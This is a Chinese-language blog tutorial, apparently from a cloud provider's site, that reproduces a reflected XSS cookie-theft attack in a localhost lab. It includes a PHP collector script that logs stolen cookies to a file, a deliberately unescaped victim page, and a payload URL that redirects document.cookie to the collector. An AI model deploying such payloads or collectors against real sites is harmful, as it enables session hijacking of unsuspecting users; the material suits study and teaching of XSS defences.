温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

XSS跨站如何获取cookie

发布时间:2021-12-22 17:38:42 来源:亿速云 阅读:1019 作者:小新 栏目:安全技术

这篇文章将为大家详细讲解有关XSS跨站如何获取cookie,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。

仅用于参考学习

测试环境:hacker端   and   victim端

1,hacker端(hacker.php)的程序内容如下:

<?php

$cookie=$_GET['cookie'];

$file=fopen("cookie.txt","a");

fwrite($file,$cookie);

fclose($file)

?>

2,受害者端(victim.php)的程序内容如下:

<html>

<head>

<title>xss跨站原理复现</title>

</head>

<body>

<form action="" method="get">

<input type="text" name="xss_input">

<input type="submit" value="提交">

</form>

<?php

$xss=@$_GET['xss_input'];

echo '你输入的字符为<br>'.$xss;

?>

</body>

</html>

3,hacker发给victim的payload语句如下:
http://localhost/victim.php?xss_input=<script>document.location="http://localhost/hacker.php?cookie="+document.cookie</script>
ps:第一次用的事件不是document.location,选择的是window.open事件,But,没有成功。更换浏览器也不照。

4,当victim点击hacker发送的链接后,Victim主机的cookie就被写入到hacker的cookie.txt文档中了,cookie信息也就因此丢失了,那么hacker久可以利用这个cookie信息针对victim做bulabula....

关于“XSS跨站如何获取cookie”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,使各位可以学到更多知识,如果觉得文章不错,请把它分享出去让更多的人看到。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI